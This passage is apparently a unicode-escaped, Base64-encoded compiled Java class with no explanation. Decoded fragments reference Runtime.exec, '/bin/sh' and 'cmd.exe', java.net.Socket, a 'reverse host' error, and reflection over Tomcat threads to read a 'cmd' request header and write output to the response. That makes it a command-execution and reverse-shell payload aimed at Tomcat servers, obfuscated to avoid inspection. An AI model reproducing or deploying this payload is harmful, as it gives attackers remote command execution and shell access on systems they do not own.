0041\u0044\u002f\u0043\u0067\u0045\u0041\u0041\u0051\u0045\u004b\u0041\u0043\u0045\u0042\u0041\u0067\u0067\u0042\u0041\u0077\u0067\u0042\u0042\u0041\u0067\u0042\u0042\u0051\u0063\u0042\u0042\u0067\u006f\u0041\u0058\u0051\u0043\u006e\u0043\u0067\u0042\u0064\u0041\u0051\u0063\u0049\u0041\u0051\u0067\u004b\u0041\u0046\u0030\u0041\u002f\u0041\u0067\u0042\u0043\u0051\u0067\u0042\u0043\u0067\u0067\u0042\u0043\u0077\u0067\u0042\u0044\u0041\u006f\u0042\u0044\u0051\u0045\u004f\u0043\u0067\u0045\u004e\u0041\u0051\u0038\u0048\u0041\u0052\u0041\u004b\u0041\u0052\u0045\u0042\u0045\u0067\u006f\u0041\u0061\u0041\u0045\u0054\u0043\u0041\u0045\u0055\u0043\u0067\u0042\u006f\u0041\u0052\u0055\u004b\u0041\u0047\u0067\u0041\u0076\u0077\u006f\u0041\u0061\u0041\u0045\u0057\u0043\u0067\u0045\u0052\u0041\u0052\u0063\u004b\u0041\u0052\u0045\u0042\u0047\u0041\u0067\u0042\u0047\u0051\u0067\u0042\u0047\u0067\u006f\u0042\u0044\u0051\u0045\u0062\u0042\u0077\u0045\u0063\u0043\u0067\u0042\u0030\u0041\u0052\u0030\u004b\u0041\u0048\u0051\u0042\u0045\u0067\u006f\u0042\u0045\u0051\u0045\u0065\u0043\u0067\u0042\u0030\u0041\u0052\u0034\u004b\u0041\u0048\u0051\u0042\u0048\u0077\u006f\u0042\u0049\u0041\u0045\u0068\u0043\u0067\u0045\u0067\u0041\u0053\u0049\u004b\u0041\u0053\u004d\u0042\u004a\u0041\u006f\u0042\u0049\u0077\u0044\u0036\u0042\u0051\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0079\u0043\u0067\u0042\u0044\u0041\u0053\u0055\u004b\u0041\u0052\u0045\u0042\u004a\u0067\u006f\u0041\u0064\u0041\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0053\u0063\u004b\u0041\u004d\u0034\u0042\u004b\u0041\u006f\u0041\u006a\u0041\u0045\u0070\u0043\u0041\u0045\u0071\u0043\u0041\u0045\u0072\u0043\u0041\u0045\u0073\u0043\u0041\u0045\u0074\u0043\u0041\u0043\u006a\u0043\u0041\u0045\u0075\u0042\u0077\u0045\u0076\u0041\u0051\u0041\u0043\u0061\u0058\u0041\u0042\u0041\u0042\u004a\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u00
73\u0042\u0041\u0041\u0052\u0077\u0062\u0033\u004a\u0030\u0041\u0051\u0041\u0054\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0042\u006a\u0078\u0070\u0062\u006d\u006c\u0030\u0050\u0067\u0045\u0041\u0041\u0079\u0067\u0070\u0056\u0067\u0045\u0041\u0042\u0045\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0041\u0039\u004d\u0061\u0057\u0035\u006c\u0054\u006e\u0056\u0074\u0059\u006d\u0056\u0079\u0056\u0047\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u0070\u0046\u0065\u0047\u004e\u006c\u0063\u0048\u0052\u0070\u0062\u0032\u0035\u007a\u0041\u0051\u0041\u004a\u0062\u0047\u0039\u0068\u005a\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0041\u0051\u0041\u006c\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u004f\u0077\u0045\u0041\u0043\u0056\u004e\u0070\u005a\u0032\u0035\u0068\u0064\u0048\u0056\u0079\u005a\u0051\u0045\u0041\u004b\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0077\u0071\u0050\u006a\u0073\u0042\u0041\u0041\u0056\u0077\u0063\u006d\u0039\u0034\u0065\u0051\u0045\u0041\u004a\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0046\u0064\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0044\u0067\u006f
\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u006d\u004e\u0073\u005a\u0057\u0046\u0079\u0055\u0047\u0046\u0079\u0059\u0057\u0030\u0042\u0041\u0041\u0052\u006c\u0065\u0047\u0056\u006a\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0051\u0045\u0041\u0046\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0074\u004a\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u0079\u0064\u0057\u0034\u0042\u0041\u0041\u005a\u006b\u005a\u0057\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0042\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u004b\u0055\u0032\u0039\u0031\u0063\u006d\u004e\u006c\u0052\u006d\u006c\u0073\u005a\u0051\u0045\u0041\u0042\u0030\u0045\u0030\u004c\u006d\u0070\u0068\u0064\u006d\u0045\u004d\u0041\u004a\u0045\u0041\u006b\u0067\u0077\u0042\u004d\u0041\u0045\u0078\u0044\u0041\u0045\u0079\u0041\u0054\u004d\u004d\u0041\u0054\u0051\u0042\u004e\u0051\u0045\u0041\u0042\u0033\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0048\u004d\u004d\u0041\u0054\u0059\u0042\u004e\u0077\u0063\u0042\u004f\u0041\u0077\u0042\u004f\u0051\u0045\u0036\u0044\u0041\u0045\u0037\u0041\u0054\u0077\u0042\u0041\u0042\u004e\u0062\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0044\u0041\u0045\u0039\u0041\u0054\u0034\u004d\u0041\u
0054\u0038\u0042\u0051\u0041\u0045\u0041\u0042\u0047\u0068\u0030\u0064\u0048\u0041\u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0035\u0076\u0055\u0033\u0056\u006a\u0061\u0045\u005a\u0070\u005a\u0057\u0078\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0042\u0041\u0054\u0055\u0042\u0041\u0041\u005a\u006e\u0062\u0047\u0039\u0069\u0059\u0057\u0077\u0042\u0041\u0041\u0070\u0077\u0063\u006d\u0039\u006a\u005a\u0058\u004e\u007a\u0062\u0033\u004a\u007a\u0041\u0051\u0041\u004f\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u0078\u0070\u0063\u0033\u0051\u004d\u0041\u0055\u0049\u0042\u0051\u0077\u0063\u0042\u0052\u0041\u0077\u0042\u0052\u0051\u0046\u0047\u0044\u0041\u0046\u0048\u0041\u0055\u0067\u0042\u0041\u0041\u004e\u0079\u005a\u0058\u0045\u0042\u0041\u0041\u0074\u006e\u005a\u0058\u0052\u0053\u005a\u0058\u004e\u0077\u0062\u0032\u0035\u007a\u005a\u0051\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0077\u0077\u0042\u0053\u0051\u0046\u004b\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0041\u0063\u0042\u0053\u0077\u0077\u0042\u0054\u0041\u0046\u004e\u0041\u0051\u0041\u004a\u005a\u0032\u0056\u0030\u0053\u0047\u0056\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u00
4e\u0030\u0063\u006d\u006c\u0075\u005a\u0077\u0045\u0041\u0041\u0032\u004e\u0074\u005a\u0041\u0077\u0041\u006d\u0067\u0043\u0062\u0044\u0041\u0046\u004f\u0041\u0055\u0038\u0042\u0041\u0041\u006c\u007a\u005a\u0058\u0052\u0054\u0064\u0047\u0046\u0030\u0064\u0058\u004d\u0048\u0041\u0056\u0041\u004d\u0041\u0056\u0045\u0042\u0055\u0067\u0077\u0042\u0055\u0077\u0046\u0055\u0041\u0051\u0041\u006b\u0062\u0033\u004a\u006e\u004c\u006d\u0046\u0077\u0059\u0057\u004e\u006f\u005a\u0053\u0035\u0030\u0062\u0032\u0031\u006a\u0059\u0058\u0051\u0075\u0064\u0058\u0052\u0070\u0062\u0043\u0035\u0069\u0064\u0057\u0059\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004e\u006f\u0064\u0057\u0035\u0072\u0044\u0041\u0043\u0057\u0041\u004a\u0063\u004d\u0041\u0056\u0055\u0042\u0053\u0041\u0045\u0041\u0043\u0048\u004e\u006c\u0064\u0045\u004a\u0035\u0064\u0047\u0056\u007a\u0041\u0051\u0041\u0043\u0057\u0030\u0049\u004d\u0041\u0056\u0059\u0042\u0053\u0067\u0045\u0041\u0042\u0032\u0052\u0076\u0056\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0041\u0051\u0041\u0054\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0075\u0061\u0057\u0038\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004a\u0031\u005a\u006d\u005a\u006c\u0063\u0067\u0045\u0041\u0042\u0048\u0064\u0079\u0059\u0058\u0041\u004d\u0041\u0056\u0063\u0041\u006c\u0077\u0045\u0041\u0049\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0035\u0076\u0064\u0045\u005a\u0076\u0064\u0057\u0035\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0059\u0041\u0056\u006b\u0048\u0041\u0056\u006f\u0042\u0041\u0041\u0041\u004d\u0041\u0056\u0073\u0042\u0058\u0041\u0045\u0041\u0045\u0047\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0062\u006d\u0039\u0030\u0049\u0047\u0035\u0031
\u0062\u0047\u0077\u004d\u0041\u0056\u0030\u0042\u0050\u0067\u0045\u0041\u0042\u0053\u004d\u006a\u0049\u0079\u004d\u006a\u0044\u0041\u0046\u0065\u0041\u0056\u0038\u004d\u0041\u004a\u0034\u0041\u006d\u0077\u0045\u0041\u0041\u0054\u006f\u004d\u0041\u0057\u0041\u0042\u0059\u0051\u0045\u0041\u0049\u006d\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0053\u0042\u006f\u0062\u0033\u004e\u0030\u0049\u0047\u005a\u0076\u0063\u006d\u0031\u0068\u0064\u0043\u0042\u006c\u0063\u006e\u004a\u0076\u0063\u0069\u0045\u004d\u0041\u0049\u0030\u0041\u006a\u0067\u0077\u0042\u0059\u0067\u0046\u006a\u0044\u0041\u0043\u0050\u0041\u004a\u0041\u0042\u0041\u0042\u0042\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0044\u0041\u0043\u0052\u0041\u0057\u0051\u004d\u0041\u0057\u0055\u0041\u006b\u0067\u0045\u0041\u0042\u0053\u0051\u006b\u004a\u0043\u0051\u006b\u0041\u0051\u0041\u0053\u005a\u006d\u006c\u0073\u005a\u0053\u0042\u006d\u0062\u0033\u004a\u0074\u0059\u0058\u0051\u0067\u005a\u0058\u004a\u0079\u0062\u0033\u0049\u0068\u0044\u0041\u0043\u0063\u0041\u004a\u0030\u0042\u0041\u0041\u0056\u0041\u0051\u0045\u0042\u0041\u0051\u0041\u0077\u0041\u006e\u0077\u0043\u0062\u0041\u0051\u0041\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0047\u0061\u0057\u0078\u006c\u0044\u0041\u0043\u0052\u0041\u0057\u0059\u0042\u0041\u0042\u0068\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u005a\u0070\u0062\u0047\u0056\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u004d\u0041\u004a\u0045\u0042\u005a\u0077\u0077\u0041\u006f\u0077\u0043\u006b\u0044\u0041\u0043\u0063\u0041\u0057\u0067\u004d\u0041\u0057\u006b\u0041\u006b\u0067\u0077\u0042\u0061\u0067\u0043\u0053\u0044\u0041\u0046\u0072\u0041\u0054\u0034\u004d\u0041\u0057\u0077\u0042\u0050\u0067\u0077\u0042\u0062\u0051\u0046\u0075\u0041\u
0051\u0041\u0048\u0062\u0033\u004d\u0075\u0062\u006d\u0046\u0074\u005a\u0051\u0063\u0042\u0062\u0077\u0077\u0042\u0063\u0041\u0043\u0062\u0044\u0041\u0046\u0078\u0041\u0054\u0034\u0042\u0041\u0041\u004e\u0033\u0061\u0057\u0034\u0042\u0041\u0041\u0052\u0077\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0043\u004c\u0057\u0034\u0042\u0041\u0042\u0064\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u0067\u0077\u0042\u0063\u0067\u0046\u007a\u0041\u0051\u0041\u0046\u0049\u0043\u0031\u0075\u0049\u0044\u0051\u0042\u0041\u0041\u0049\u0076\u0059\u0077\u0045\u0041\u0042\u0053\u0041\u0074\u0064\u0043\u0041\u0030\u0041\u0051\u0041\u0043\u0063\u0032\u0067\u0042\u0041\u0041\u0049\u0074\u0059\u0077\u0063\u0042\u0064\u0041\u0077\u0042\u0064\u0051\u0046\u0032\u0044\u0041\u0043\u0066\u0041\u0058\u0063\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0033\u0056\u0030\u0061\u0057\u0077\u0076\u0055\u0032\u004e\u0068\u0062\u006d\u0035\u006c\u0063\u0067\u0063\u0042\u0065\u0041\u0077\u0042\u0065\u0051\u0046\u0036\u0044\u0041\u0043\u0052\u0041\u0058\u0073\u0042\u0041\u0041\u004a\u0063\u0059\u0051\u0077\u0042\u0066\u0041\u0046\u0039\u0044\u0041\u0046\u0048\u0041\u0054\u0034\u004d\u0041\u0058\u0034\u0042\u0065\u0067\u0077\u0042\u0066\u0077\u0043\u0053\u0041\u0051\u0041\u0048\u004c\u0032\u004a\u0070\u0062\u0069\u0039\u007a\u0061\u0041\u0045\u0041\u0042\u0032\u004e\u0074\u005a\u0043\u0035\u006c\u0065\u0047\u0055\u004d\u0041\u004a\u0038\u0042\u0067\u0041\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u006d\u0056\u0030\u004c\u0031\u004e\u0076\u0059\u0032\u0074\u006c\u0064\u0041\u0077\u0041\u006b\u0051\u0043\u0068\u0044\u0041\u0047\u0042\u0041\u0059\u0049\u004d\u0041\u0059\u004d\u0042\u0052\u0067\u0063\u0042\u0068\u0041\u0077\u0042\u0068\u0051\u0047\u0047\u0044\u0041\u0047\u0048\u0041\u0059\u0059\u0048\u0041\u0059\u0067\u004d\u0041\u004a\u00
77\u0042\u0069\u0051\u0077\u0042\u0069\u0067\u0047\u004c\u0044\u0041\u0047\u004d\u0041\u0059\u0059\u004d\u0041\u0059\u0030\u0042\u0050\u0067\u0077\u0042\u006a\u0067\u0047\u0047\u0044\u0041\u0043\u0067\u0041\u004b\u0045\u0042\u0041\u0042\u005a\u007a\u0064\u0057\u0034\u0075\u0062\u0057\u006c\u007a\u0059\u0079\u0035\u0043\u0051\u0056\u004e\u0046\u004e\u006a\u0052\u0045\u005a\u0057\u004e\u0076\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u004d\u005a\u0047\u0056\u006a\u0062\u0032\u0052\u006c\u0051\u006e\u0056\u006d\u005a\u006d\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0031\u0064\u0047\u006c\u0073\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0052\u006c\u0059\u0032\u0039\u006b\u005a\u0058\u0049\u0042\u0041\u0043\u005a\u0076\u0063\u006d\u0063\u0075\u0059\u0058\u0042\u0068\u0059\u0032\u0068\u006c\u004c\u006d\u004e\u0076\u0062\u0057\u0031\u0076\u0062\u006e\u004d\u0075\u0059\u0032\u0039\u006b\u005a\u0057\u004d\u0075\u0059\u006d\u006c\u0075\u0059\u0058\u004a\u0035\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0041\u006b\u0045\u0030\u0041\u0051\u0041\u004e\u0059\u0033\u0056\u0079\u0063\u006d\u0056\u0075\u0064\u0046\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0043\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0042\u0041\u0042\u006b\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0042\u0041\u0042\u004d\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068
\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0051\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u0047\u0061\u0057\u0056\u0073\u005a\u0041\u0045\u0041\u004c\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u004f\u0077\u0045\u0041\u0046\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u0041\u0051\u0041\u004e\u0063\u0032\u0056\u0030\u0051\u0057\u004e\u006a\u005a\u0058\u004e\u007a\u0061\u0057\u004a\u0073\u005a\u0051\u0045\u0041\u0042\u0043\u0068\u0061\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u006e\u005a\u0058\u0051\u0042\u0041\u0043\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0077\u0045\u0041\u0042\u0032\u0064\u006c\u0064\u0045\u0035\u0068\u0062\u0057\u0055\u0042\u0041\u0042\u0051\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u0047\u004e\u0076\u0062\u006e\u0052\u0068\u0061\u0057\u0035\u007a\u0041\u0051\u0041\u0062\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0068\u0068\u0063\u006c\u004e\u006c\u0063\u0058\u0056\u006c\u0062\u006d\u004e\u006c\u004f\u0079\u006c\u0061\u0041\u
0051\u0041\u004e\u005a\u0032\u0056\u0030\u0055\u0033\u0056\u0077\u005a\u0058\u004a\u006a\u0062\u0047\u0046\u007a\u0063\u0077\u0045\u0041\u0043\u0047\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u0041\u0051\u0041\u0057\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u004f\u0077\u0045\u0041\u0045\u006d\u0070\u0068\u0064\u006d\u0045\u0076\u0064\u0058\u0052\u0070\u0062\u0043\u0039\u004a\u0064\u0047\u0056\u0079\u0059\u0058\u0052\u0076\u0063\u0067\u0045\u0041\u0042\u0032\u0068\u0068\u0063\u0030\u0035\u006c\u0065\u0048\u0051\u0042\u0041\u0041\u004d\u006f\u004b\u0056\u006f\u0042\u0041\u0041\u0052\u0075\u005a\u0058\u0068\u0030\u0041\u0051\u0041\u0055\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0042\u0041\u0041\u006c\u006e\u005a\u0058\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0045\u0041\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0063\u006d\u0056\u006d\u0062\u0047\u0056\u006a\u0064\u0043\u0039\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0037\u0041\u0051\u0041\u0059\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0033\u004a\u006c\u005a\u006d\u0078\u006c\u0059\u0033\u0051\u0076\u0054\u0057\u0056\u0030\u0061\u0047\u0039\u006b\u0041\u0051\u0041\u0047\u0061\u0057\u0035\u0032\u0062\u0032\u0074\u006c\u0041\u0051\u0041\u0035\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u00
4a\u0071\u005a\u0057\u004e\u0030\u004f\u0031\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u006e\u006c\u0030\u005a\u0058\u004d\u0042\u0041\u0041\u0051\u006f\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u006c\u0075\u0064\u0047\u0056\u006e\u005a\u0058\u0049\u0042\u0041\u0041\u0052\u0055\u0057\u0056\u0042\u0046\u0041\u0051\u0041\u0052\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0073\u0042\u0041\u0041\u0064\u0032\u0059\u0057\u0078\u0031\u005a\u0055\u0039\u006d\u0041\u0051\u0041\u0057\u004b\u0045\u006b\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0043\u0032\u0035\u006c\u0064\u0030\u006c\u0075\u0063\u0033\u0052\u0068\u0062\u006d\u004e\u006c\u0041\u0051\u0041\u0052\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0041\u0064\u006d\u0062\u0033\u004a\u004f\u0059\u0057\u0031\u006c\u0041\u0051\u0041\u0056\u005a\u0032\u0056\u0030\u0051\u0032\u0039\u0075\u0064\u0047\u0056\u0034\u0064\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u005a\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u004f\u0077\u0045\u0041\u0046\u0057\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075
